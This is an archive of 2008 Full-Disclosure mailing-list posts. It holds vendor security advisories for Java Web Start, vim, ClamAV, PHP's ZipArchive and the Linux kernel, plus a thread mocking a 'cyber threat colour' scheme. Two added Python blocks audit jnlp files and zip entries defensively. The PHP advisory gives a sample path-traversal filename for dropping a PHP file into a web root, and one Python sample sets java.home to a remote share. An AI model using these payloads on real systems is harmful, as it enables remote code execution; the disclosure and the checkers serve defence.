A firewall installed between the attacker and victim could mitigate this issue if the victim's machine were restricted from accessing the hosted network share. Note that certain JWS applications may trust other System properties, such as user.home, and use them in ways which could be exploited in application-specific variants of this attack. Versions Affected - ----------------- During testing, VSR found the following JRE versions to be vulnerable: * 1.5.0_15 on Windows * 1.6.0 on Windows * 1.5.0_13-b05-237 on Mac OS X (distributed by Apple) Version 1.6.0_05 on Windows did not appear to be vulnerable. However, Sun recommends that any installations with the following versions be updated: * JDK and JRE 6 Update 10 and earlier * JDK and JRE 5.0 Update 16 and earlier * SDK and JRE 1.4.2_18 and earlier Sun reports that JRE 1.3.x is not affected, nor is JRE 6 Update 7 for Intel Itanium. For more information on versions affected and updates, see [3]. Vendor Response - --------------- The following timeline details Sun's response to the reported issue: 2008-03-28 Sun was provided a draft advisory. 2008-03-28 An initial response was received from Sun. 2008-04-11 Sun reported that the issue could not be reproduced. 2008-04-11 VSR provided Sun additional exploit details. 2008-04-29 Sun reported the issue was reproduced and assigned an internal issue tracking number of CR 6694892. 2008-12-03 Sun Alert 244988 was released with an associated security update. Sun Alert 244988 may be obtained at: http://sunsolve.sun.com/search/document.do?assetkey=1-66-244988-1 Recommendation - -------------- Apply the JRE update as soon as possible. The issue is fixed in: * JDK and JRE 6 Update 11 or later * JDK and JRE 5.0 Update 17 or later * SDK and JRE 1.4.2_19 or later Review Sun Alert 244988 [3] for information on how to temporarily disable Java Web Start to work around this issue. 
Common Vulnerabilities and Exposures (CVE) Information - ------------------------------------------------------ The Common Vulnerabilities and Exposures (CVE) project has assigned the number CVE-2008-2086 to this issue. This is a candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. Acknowledgements - ---------------- Thanks to George Gal for assistance in testing. VSR would like to thank Sun for cooperating in the patch development process. - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- References: 1. Java Web Start Technology http://java.sun.com/products/javawebstart/ 2. Java Web Start Architecture JNLP Specification & API Documentation http://java.sun.com/products/javawebstart/download-spec.html 3. Sun Alert 244988 http://sunsolve.sun.com/search/document.do?assetkey=1-66-244988-1 - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Copyright 2008 Virtual Security Research, LLC. All rights reserved. 
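A defensive check for the override described in the advisory above, as an added Python example that is not part of VSR's advisory or Sun's fix: it parses a jnlp descriptor and reports `<property>` elements in `<resources>` that set the three System properties VSR lists, noting whether the value is a UNC or URL-style path and whether the descriptor requests full privileges. The sample descriptor, host names and function names are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

# System properties the advisory reports as overridable from a jnlp file.
SENSITIVE_PROPERTIES = {"java.home", "java.ext.dirs", "user.home"}
# The two the advisory singles out because class loading trusts them.
CLASS_LOADING_PROPERTIES = {"java.home", "java.ext.dirs"}

# UNC path (\\host\share or //host/share) or scheme://... value.
REMOTE_VALUE = re.compile(r"^(\\\\|//)[^\\/]+[\\/]|^[a-zA-Z][a-zA-Z0-9+.-]*://")


def audit_jnlp(text):
    """Return one finding per sensitive property set in a jnlp descriptor."""
    upper = text.upper()
    # jnlp files arrive from untrusted sites: refuse DTDs and entity
    # declarations instead of letting the XML parser expand them.
    if "<!DOCTYPE" in upper or "<!ENTITY" in upper:
        raise ValueError("DTD/entity declarations are not accepted in jnlp input")
    root = ET.fromstring(text)
    all_permissions = root.find("./security/all-permissions") is not None
    findings = []
    # iter() also reaches <resources> nested under <j2se>/<java> elements.
    for resources in root.iter("resources"):
        for prop in resources.findall("property"):
            name = (prop.get("name") or "").strip()
            value = (prop.get("value") or "").strip()
            if name not in SENSITIVE_PROPERTIES:
                continue
            findings.append({
                "property": name,
                "value": value,
                "remote": bool(REMOTE_VALUE.match(value)),
                "class_loading": name in CLASS_LOADING_PROPERTIES,
                "all_permissions": all_permissions,
            })
    return findings


# Constructed sample descriptor (not the one from the advisory).
SAMPLE_JNLP = r"""<jnlp spec="1.0+" codebase="http://apps.example.com/" href="app.jnlp">
  <information>
    <title>Example App</title>
    <vendor>Example Vendor</vendor>
  </information>
  <security><all-permissions/></security>
  <resources>
    <j2se version="1.5+"/>
    <jar href="app.jar"/>
    <property name="app.locale" value="en_US"/>
    <property name="java.home" value="\\files.example.net\share\jre"/>
    <property name="user.home" value="C:\Temp"/>
  </resources>
  <application-desc main-class="com.example.Main"/>
</jnlp>
"""

if __name__ == "__main__":
    for finding in audit_jnlp(SAMPLE_JNLP):
        print(finding)
```

A finding with `class_loading` and `remote` both true on a descriptor that requests all permissions matches the combination the advisory calls out; on patched JREs the same descriptor is still worth flagging at a proxy or mail gateway.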
From security at mandriva.com Thu Dec 4 04:16:00 2008
From: security at mandriva.com (security at mandriva.com)
Date: Wed, 03 Dec 2008 21:16:00 -0700
Subject: [Full-disclosure] [ MDVSA-2008:236 ] vim
Message-ID:

_______________________________________________________________________

Mandriva Linux Security Advisory MDVSA-2008:236
http://www.mandriva.com/security/
_______________________________________________________________________

Package : vim
Date : December 3, 2008
Affected: 2008.0, 2008.1, 2009.0, Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0
_______________________________________________________________________

Problem Description:

Several vulnerabilities were found in the vim editor:

A number of input sanitization flaws were found in various vim system functions. If a user were to open a specially crafted file, it would be possible to execute arbitrary code as the user running vim (CVE-2008-2712).

Ulf Härnhammar of Secunia Research found a format string flaw in vim's help tags processor. If a user were tricked into executing the helptags command on malicious data, it could result in the execution of arbitrary code as the user running vim (CVE-2008-2953).

A flaw was found in how tar.vim handled TAR archive browsing. If a user were to open a special TAR archive using the plugin, it could result in the execution of arbitrary code as the user running vim (CVE-2008-3074).

A flaw was found in how zip.vim handled ZIP archive browsing. If a user were to open a special ZIP archive using the plugin, it could result in the execution of arbitrary code as the user running vim (CVE-2008-3075).

A number of security flaws were found in netrw.vim, the vim plugin that provides the ability to read and write files over the network. If a user opened a specially crafted file or directory with the netrw plugin, it could result in the execution of arbitrary code as the user running vim (CVE-2008-3076).

A number of input validation flaws were found in vim's keyword and tag handling. If vim looked up a document's maliciously crafted tag or keyword, it was possible to execute arbitrary code as the user running vim (CVE-2008-4101).

A vulnerability was found in certain versions of netrw.vim where it would send FTP credentials stored for an FTP session to subsequent FTP sessions to servers on different hosts, exposing FTP credentials to remote hosts (CVE-2008-4677).

This update provides vim 7.2 (patchlevel 65) which corrects all of these issues and introduces a number of new features and bug fixes.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2712
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2953
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3074
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3075
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3076
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4101
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4677
_______________________________________________________________________

Updated Packages:

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team

From fw at deneb.enyo.de Thu Dec 4 08:26:17 2008
From: fw at deneb.enyo.de (Florian Weimer)
Date: Thu, 04 Dec 2008 09:26:17 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1680-1] New clamav packages fix potential code execution
Message-ID: <87r64os5w6.fsf@mid.deneb.enyo.de>

------------------------------------------------------------------------
Debian Security Advisory DSA-1680-1                  security at debian.org
http://www.debian.org/security/                           Florian Weimer
December 04, 2008                     http://www.debian.org/security/faq
------------------------------------------------------------------------

Package        : clamav
Vulnerability  : buffer overflow, stack consumption
Problem type   : local (remote)
Debian-specific: no
CVE Id(s)      : CVE-2008-5050 CVE-2008-5314
Debian Bug     : 505134 507624

Moritz Jodeit discovered that ClamAV, an anti-virus solution, suffers from an off-by-one-error in its VBA project file processing, leading to a heap-based buffer overflow and potentially arbitrary code execution (CVE-2008-5050).

Ilja van Sprundel discovered that ClamAV contains a denial of service condition in its JPEG file processing because it does not limit the recursion depth when processing JPEG thumbnails (CVE-2008-5314).

For the stable distribution (etch), these problems have been fixed in version 0.90.1dfsg-4etch16.

For the unstable distribution (sid), these problems have been fixed in version 0.94.dfsg.2-1. The testing distribution (lenny) will be fixed soon.

We recommend that you upgrade your clamav packages.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
-------------------------------

These files will probably be moved into the stable distribution on its next update.

---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

From stefan.esser at sektioneins.de Thu Dec 4 07:39:36 2008
From: stefan.esser at sektioneins.de (Stefan Esser)
Date: Thu, 4 Dec 2008 08:39:36 +0100
Subject: [Full-disclosure] Advisory 06/2008: PHP ZipArchive::extractTo() Directory Traversal Vulnerability
Message-ID: <20081204073936.GA2323@hardened-php.net>

SektionEins GmbH
www.sektioneins.de

-= Security Advisory =-

Advisory: PHP ZipArchive::extractTo() Directory Traversal Vulnerability
Release Date: 2008/12/04
Last Modified: 2008/12/04
Author: Stefan Esser [stefan.esser[at]sektioneins.de]
Application: PHP 5 <= 5.2.6
Severity: PHP applications using ZipArchive::extractTo() to unpack zip archive files can be tricked to overwrite arbitrary files writable by the webserver which might result in PHP remote code execution
Risk: Medium
Vendor Status: Vendor has released PHP 5.2.7 which contains an updated ZipArchive::extractTo() method that flattens the filename stored inside zip archives before unpacking
Reference: http://www.sektioneins.de/advisories/SE-2008-06.txt

Overview:

Quote from http://www.php.net
"PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML."

PHP comes with the zip extension that provides the ZipArchive class for zip archive manipulation. During an audit of a large scale PHP application that uses ZipArchive::extractTo() to unpack user uploaded zip archives to temporary directories it was discovered that ZipArchive::extractTo() does not flatten the filenames stored inside the zip archives.

Therefore it is possible to create zip archives containing relative filenames that when unpacked will create or overwrite files outside of the temporary directory.

In applications like the one in question this results in a remote PHP code execution vulnerability, because we are able to drop new PHP files in writable directories within the webserver's document root directory.

Details:

No details required. To exploit this an attacker just needs to create a zip archive containing filenames like

../../../../../../../../../../../var/www/wr_dir/evil.php

An easy way to achieve that is to just store a file with a long name inside the zip archive and then change it with a hex editor.

Proof of Concept:

SektionEins GmbH is not going to release a proof of concept exploit for this vulnerability.

Disclosure Timeline:

23. June 2008 - Notified security at php.net
04. December 2008 - PHP developers released PHP 5.2.7
04. December 2008 - Public Disclosure

Recommendation:

It is recommended to upgrade to the latest version of PHP which also fixes additional vulnerabilities reported by third parties.

Grab your copy at:
http://www.php.net/get/php-5.2.7.tar.bz2/from/a/mirror

CVE Information:

The Common Vulnerabilities and Exposures project (cve.mitre.org) has not assigned a name to this vulnerability yet.

GPG-Key:

pub 1024D/15ABDA78 2004-10-17 Stefan Esser
Key fingerprint = 7806 58C8 CFA8 CE4A 1C2C 57DD 4AE1 795E 15AB DA78

Copyright 2008 SektionEins GmbH. All rights reserved.
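One way to apply the advisory's point on the application side, as an added Python example (not SektionEins's or the PHP project's code): inspect every entry name before unpacking an uploaded archive and refuse the whole upload if any name is absolute, escapes the target directory, contains a `..` component, or is a symbolic link. The function names and the in-memory sample archive are constructed for illustration.

```python
import io
import posixpath
import stat
import zipfile


def classify_entry(info):
    """Return None if the entry may be unpacked under a base directory,
    otherwise a short reason for rejecting it."""
    # Treat backslashes as separators too: extractors on Windows do.
    name = info.filename.replace("\\", "/")
    if not name:
        return "empty name"
    if name.startswith("/") or (len(name) > 1 and name[1] == ":"):
        return "absolute path"
    # Resolve against a placeholder root; leaving it means traversal.
    resolved = posixpath.normpath(posixpath.join("/base", name))
    if resolved != "/base" and not resolved.startswith("/base/"):
        return "escapes extraction directory"
    # Strict policy: no '..' at all, even if it resolves inside the root.
    if ".." in name.split("/"):
        return "contains '..' component"
    # Unix mode bits live in the high 16 bits of external_attr.
    if stat.S_ISLNK(info.external_attr >> 16):
        return "symbolic link entry"
    return None


def audit_archive(data):
    """Split an archive (bytes) into safe names and (name, reason) rejects."""
    safe, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            reason = classify_entry(info)
            if reason is None:
                safe.append(info.filename)
            else:
                rejected.append((info.filename, reason))
    return safe, rejected


def extract_if_clean(data, dest):
    """Unpack only when every entry passes; otherwise refuse the upload."""
    _, rejected = audit_archive(data)
    if rejected:
        raise ValueError("archive rejected: %r" % (rejected,))
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        zf.extractall(dest)


def build_sample():
    """Constructed test archive with one good entry and four bad ones."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs/readme.txt", b"ok")
        zf.writestr("../../outside.txt", b"x")
        zf.writestr("/tmp/absolute.txt", b"x")
        zf.writestr("images\\..\\..\\up.txt", b"x")
        link = zipfile.ZipInfo("docs/link")
        link.external_attr = (stat.S_IFLNK | 0o777) << 16
        zf.writestr(link, b"target")
    return buf.getvalue()


if __name__ == "__main__":
    safe, rejected = audit_archive(build_sample())
    print("safe:", safe)
    for name, reason in rejected:
        print("rejected:", repr(name), "-", reason)
```

Rejecting the upload outright, rather than silently rewriting names, also leaves a log entry that someone submitted a traversal attempt.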
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (Darwin)

iEYEARECAAYFAkk3qT4ACgkQSuF5XhWr2nho0QCgi6JABGlJUbf7Z3eR61J7KQMH
JhoAnRBzGsfci/OsDBEVtv+UBE2UZ+I1
=X9Yi
-----END PGP SIGNATURE-----

From rysheve at gmail.com Thu Dec 4 15:03:22 2008
From: rysheve at gmail.com (Chris Jeane)
Date: Thu, 4 Dec 2008 09:03:22 -0600
Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security
In-Reply-To: <49375527.3070804@clusterbee.net>
References: <20081202192922.62A6C118041@smtp.hushmail.com> <49375527.3070804@clusterbee.net>
Message-ID:

The Project Chroma Project website reads (I have highlighted the colors in black so that they are readable):

Green level: There is negligible threat to online security.

Ok this one is pretty simple.

Yellow level : There is a minimal level of threat, and this must be monitored and contained.

The SANS ISC says : "We are currently *tracking* a significant new threat. The impact is either unknown or expected to be minor to the infrastructure. However, local impact could be significant. Users are advised to take immediate specific *action to contain* the impact."
You are giving an abbreviated version of something that already exists and is accepted.

Orange level: This level of threat indicates there are parties who are actively engaging in cyber-warfare. Caution is required when online.

Caution is *always* required when online. If you are in an area (country/province/region) that is affected by cyber attacks you will have limited/no access to the internet. If only your company/person is being assaulted from cyberspace the attack would probably go unnoticed by this monitoring system. If the attackers were committing a DDOS attack on several specific non-infrastructure targets, your internet access may slow/go dark, but is that really a threat to you? or one you can protect against?

Red level: This level indicates a full blown cyber-war. It indicates very high probability of all communications being intercepted.

The use of the term 'full blown cyber-war' seems like an overarching scare tactic. We have yet to see what cyber-warfare looks like. Estonia was a one sided cyber ambush, not two entities engaging in war. The alerts should be more generic and accompanied by an assessment of the actual *current* situation. If something like 'Code Red' were to infect the internet again this alert calling it cyber-war would be a misnomer.

While homeland security's implementation does not seem to have a real world merit, such a threat level would certainly be very useful in the online security realm.

Who is this useful to: Security professionals, end users, governmental agencies? How and why as similar systems already exist?

Please disseminate this announcement of the project Chroma levels for online security. The immediate mission of the project is to be picked up by the antivirus and security tools vendors, so as to add the color codes to their products and provide users with a tangible measure of their online security.

Yellow is not a tangible measure of their online security. If perhaps an Online Security/IPS package knew that a DDoS attack was coming for an address segment of the internet and it requested that I block traffic from those attackers until an all clear or *Green* status was given. *That is tangible and actionable.*

Current status: Threat level Yellow.

Your current is higher than SANS ISC. Do you know something they don't?

On Wed, Dec 3, 2008 at 9:57 PM, Luke Scharf wrote:

> Mike C wrote:
> >> If you really want to change state of security for the n00bs,
> >> spread the knowledge, not the colors.
> >>
> >>
> > That's what project Chroma is all about.. Are you on board?!
> >
>
> This already exists, backed up by some hard-core security competence:
> http://isc.sans.org/infocon.html
> http://isc.sans.org/
>
> Has it changed the world?
>
> -Luke
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

From kz20fl at googlemail.com Thu Dec 4 15:15:21 2008
From: kz20fl at googlemail.com (James Rankin)
Date: Thu, 4 Dec 2008 15:15:21 +0000
Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security
In-Reply-To:
References: <20081202192922.62A6C118041@smtp.hushmail.com> <49375527.3070804@clusterbee.net>
Message-ID: <8826b4700812040715x662acd8i6c54229892e039a9@mail.gmail.com>

"full-blown cyber war"

This indicates that Mike C is N3tN00b, and is also about to join him on the spam filter.

Flame away, cos I won't hear you Mike/N3tty

2008/12/4 Chris Jeane

> The Project Chroma Project website reads (I have highlighted the colors in
> black so that they are readable):
>
> Green level: There is negligible threat to online security.
>
> Ok this one is pretty simple.
>
> Yellow level : There is a minimal level of threat, and this must be
> monitored and contained.
>
> The SANS ISC says : "We are currently *tracking* a significant new threat.
> The impact is either unknown or expected to be minor to the infrastructure.
> However, local impact could be significant. Users are advised to take
> immediate specific *action to contain* the impact."
> You are giving an abbreviated version of something that already exists and
> is accepted.
>
> Orange level: This level of threat indicates there are parties who are
> actively engaging in cyber-warfare. Caution is required when online.
>
> Caution is *always* required when online. If you are in an area
> (country/province/region) that is affected by cyber attacks you will have
> limited/no access to the internet.
> If only your company/person is being
> assaulted from cyberspace the attack would probably go unnoticed by this
> monitoring system. If the attackers were committing a DDOS attack on several
> specific non-infrastructure targets, your internet access may slow/go dark, but
> is that really a threat to you? or one you can protect against?
>
> Red level: This level indicates a full blown cyber-war. It indicates
> very high probability of all communications being intercepted.
>
> The use of the term 'full blown cyber-war' seems like an overarching scare
> tactic. We have yet to see what cyber-warfare looks like. Estonia was a one
> sided cyber ambush, not two entities engaging in war. The alerts should be
> more generic and accompanied by an assessment of the actual *current* situation.
> If something like 'Code Red' were to infect the internet again this alert
> calling it cyber-war would be a misnomer.
>
> While homeland security's implementation does not seem to have a real
> world merit, such a threat level would certainly be very useful in the
> online security realm.
>
> Who is this useful to: Security professionals, end users, governmental
> agencies? How and why as similar systems already exist?
>
> Please disseminate this announcement of the
> project Chroma levels for online security. The immediate mission of
> the project is to be picked up by the antivirus and security tools
> vendors, so as to add the color codes to their products and provide
> users with a tangible measure of their online security.
>
> Yellow is not a tangible measure of their online security. If perhaps an
> Online Security/IPS package knew that a DDoS attack was coming for an
> address segment of the internet and it requested that I block traffic from
> those attackers until an all clear or *Green*
> status was given. *That is tangible and actionable.*
>
> Current status: Threat level Yellow.
> Your current is higher than SANS ISC. Do you know something they don't?
>
> On Wed, Dec 3, 2008 at 9:57 PM, Luke Scharf wrote:
>
>> Mike C wrote:
>> >> If you really want to change state of security for the n00bs,
>> >> spread the knowledge, not the colors.
>> >>
>> >>
>> > That's what project Chroma is all about.. Are you on board?!
>> >
>>
>> This already exists, backed up by some hard-core security competence:
>> http://isc.sans.org/infocon.html
>> http://isc.sans.org/
>>
>> Has it changed the world?
>>
>> -Luke
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

From Valdis.Kletnieks at vt.edu Thu Dec 4 16:27:05 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Thu, 04 Dec 2008 11:27:05 -0500
Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security
In-Reply-To: Your message of "Wed, 03 Dec 2008 21:57:27 CST." <49375527.3070804@clusterbee.net>
References: <20081202192922.62A6C118041@smtp.hushmail.com> <49375527.3070804@clusterbee.net>
Message-ID: <34334.1228408025@turing-police.cc.vt.edu>

On Wed, 03 Dec 2008 21:57:27 CST, Luke Scharf said:

> This already exists, backed up by some hard-core security competence:
> http://isc.sans.org/infocon.html
> http://isc.sans.org/
>
> Has it changed the world?

The most useful aspect of the SANS color meter is the fact that when it changes, they *also* publish an in-depth article about the threat that made them change the level.
So you as a security professional can say "Wow, the meter just flickered, I better go read the latest and act on it..."

Note the last 4 words there. That's the distinction between a useful service and a color-du-jour marker - actionable information.

Or you can just point your favorite RSS reader at the article feed:

http://isc.sans.org/diary.html?rss

and have *it* chirp at you when there's a new article.

From razishaban at gmail.com Thu Dec 4 16:36:55 2008
From: razishaban at gmail.com (Razi Shaban)
Date: Thu, 4 Dec 2008 18:36:55 +0200
Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security
In-Reply-To:
References: <20081202192922.62A6C118041@smtp.hushmail.com> <49375527.3070804@clusterbee.net>
Message-ID: <2d792fb20812040836r7746afdahf5ab892579069878@mail.gmail.com>

On Thu, Dec 4, 2008 at 5:03 PM, Chris Jeane wrote:
> The Project Chroma Project website reads (I have highlighted the colors in
> black so that they are readable):
>
> Levels crap
>

On Thu, Dec 4, 2008 at 6:28 PM, Razi Shaban wrote:
> On Thu, Dec 4, 2008 at 6:02 PM, Chris Jeane wrote:
>> Exactly. Which is why there is a need of a system that contains more
>> information and less cookie cutter levels. We still don't know what a
>> cyber-war looks like. One country could attack the transport/power systems
>> of a third party that supplies/supports their target. This is all
>> hypothetical, but there is a high probability of collateral damage.
>>
>
> You misunderstood me. What I was getting at is that your ideas,
> including a "cyber-war" and all this leveling, show that you are about
> as uninformed as n3td3v. Please take your nub spam somewhere else.
>
> --
> Razi Shaban
>

To explain the idea of leveling:

The internet is a gigantic place. No matter when and from where you connect, it is out to get you, you individually. Also, large-scale cyber wars are a constant thing. I am aware of three very large-scale wars taking place at the moment, does that increase or decrease the risk any user would be taking by accessing the internet? Of course not. The concept of basing a levelling system on a few organized national or private attempts to do something or another is ridiculous; the Estonian attack compromised less than 0.0001% of all cyber attacks during that time period.

The matter of the fact is, attempting to take the hugely complex and intricate dark side of the internet and summarize it in a color level is absurd. In fact, attempting to summarize it at all is ridiculous. Summarizing implies that you know everything about the topic. Anyone trying to summarize this knows nothing when he/she realizes the vastness of the internet.

tl;dr : attempting to summarize the internet is less fruitful than throwing ice cubes at the sun, but it requires much lesser intelligence to do the first.

--
Razi Shaban

From dannf at debian.org Thu Dec 4 17:59:11 2008
From: dannf at debian.org (dann frazier)
Date: Thu, 4 Dec 2008 10:59:11 -0700
Subject: [Full-disclosure] [SECURITY] [DSA 1681-1] New Linux 2.6.24 packages fix several vulnerabilities
Message-ID: <20081204175911.GG14564@ldl.fc.hp.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ----------------------------------------------------------------------
Debian Security Advisory DSA-1681-1                security at debian.org
http://www.debian.org/security/          Dann Frazier, Alexander Prinsier
December 04, 2008                     http://www.debian.org/security/faq
- ----------------------------------------------------------------------

Package        : linux-2.6.24
Vulnerability  : denial of service/privilege escalation
Problem type   : local/remote
Debian-specific: no
CVE Id(s)      : CVE-2008-3528 CVE-2008-4554 CVE-2008-4576 CVE-2008-4618
                 CVE-2008-4933 CVE-2008-4934 CVE-2008-5025 CVE-2008-5029
                 CVE-2008-5134 CVE-2008-5182 CVE-2008-5300

Several vulnerabilities have been discovered in the Linux kernel that may lead to a denial of service or privilege escalation. The Common Vulnerabilities and Exposures project identifies the following problems:

CVE-2008-3528

    Eugene Teo reported a local DoS issue in the ext2 and ext3 filesystems. Local users who have been granted the privileges necessary to mount a filesystem would be able to craft a corrupted filesystem that causes the kernel to output error messages in an infinite loop.

CVE-2008-4554

    Milos Szeredi reported that the usage of splice() on files opened with O_APPEND allows users to write to the file at arbitrary offsets, enabling a bypass of possible assumed semantics of the O_APPEND flag.

CVE-2008-4576

    Vlad Yasevich reported an issue in the SCTP subsystem that may allow remote users to cause a local DoS by triggering a kernel oops.

CVE-2008-4618

    Wei Yongjun reported an issue in the SCTP subsystem that may allow remote users to cause a local DoS by triggering a kernel panic.

CVE-2008-4933

    Eric Sesterhenn reported a local DoS issue in the hfsplus filesystem. Local users who have been granted the privileges necessary to mount a filesystem would be able to craft a corrupted filesystem that causes the kernel to overrun a buffer, resulting in a system oops or memory corruption.

CVE-2008-4934

    Eric Sesterhenn reported a local DoS issue in the hfsplus filesystem. Local users who have been granted the privileges necessary to mount a filesystem would be able to craft a corrupted filesystem that results in a kernel oops due to an unchecked return value.

CVE-2008-5025

    Eric Sesterhenn reported a local DoS issue in the hfs filesystem. Local users who have been granted the privileges necessary to mount a filesystem would be able to craft a filesystem with a corrupted catalog name length, resulting in a system oops or memory corruption.

CVE-2008-5029

    Andrea Bittau reported a DoS issue in the unix socket subsystem that allows a local user to cause memory corruption, resulting in a kernel panic.

CVE-2008-5134

    Johannes Berg reported a remote DoS issue in the libertas wireless driver, which can be triggered by a specially crafted beacon/probe response.

CVE-2008-5182

    Al Viro reported race conditions in the inotify subsystem that may allow local users to acquire elevated privileges.

CVE-2008-5300

    Dann Frazier reported a DoS condition that allows local users to cause the out of memory handler to kill off privileged processes or trigger soft lockups due to a starvation issue in the unix socket subsystem.

For the stable distribution (etch), these problems have been fixed in version 2.6.24-6~etchnhalf.7.

We recommend that you upgrade your linux-2.6.24 packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
- -------------------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.7_powerpc.deb Size/MD5 checksum: 81090 bbb53435753b18bfbf5e79f3a6b2cdcf s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.7_s390.deb Size/MD5 checksum: 81080 b2e7e3ee09134a4119106f6b2dbd1b9a http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-s390x_2.6.24-6~etchnhalf.7_s390.deb Size/MD5 checksum: 193016 a738d97e9b92b948b604233b727b57b5 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.7_s390.deb Size/MD5 checksum: 3427926 a8052afe77d6a40855abfd5632f90ffe http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-s390_2.6.24-6~etchnhalf.7_s390.deb Size/MD5 checksum: 192808 6873cb323b4a4c482ee70e9681f690db http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390-tape_2.6.24-6~etchnhalf.7_s390.deb Size/MD5 checksum: 1499452 b52895ec51a4442e11f9b9131aabca24 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390x_2.6.24-6~etchnhalf.7_s390.deb Size/MD5 checksum: 7196080 9492b52dc99eb89c5e512ed98a02edd0 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-s390_2.6.24-6~etchnhalf.7_s390.deb Size/MD5 checksum: 81096 abc2970b4b3b4c61096e64630a382e1a http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390_2.6.24-6~etchnhalf.7_s390.deb Size/MD5 checksum: 6945738 55db5c2717615f2b6a906b7a48ba6125 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.7_sparc.deb Size/MD5 checksum: 81080 b881c0458f040d249cfadefd6f650ad9 
